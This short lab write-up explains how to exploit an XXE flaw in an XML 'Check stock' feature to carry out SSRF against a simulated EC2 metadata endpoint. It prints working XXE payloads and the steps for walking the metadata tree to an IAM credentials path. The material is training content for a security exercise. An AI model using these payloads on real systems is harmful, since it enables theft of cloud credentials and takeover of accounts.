This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.
The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.
To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.
Initial payload = <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "<http://169.254.169.254/>"> ]>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "<http://169.254.169.254/latest/meta-data/iam/security-credentials/admin>"> ]>
1. Try injecting initial payload, and access via &xxe; as per previous lab
2. Iteratively visit /latest /meta-data / ...
3. Get the access key
http://169.254.169.254/ is the default metadata URL. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.htmlChensan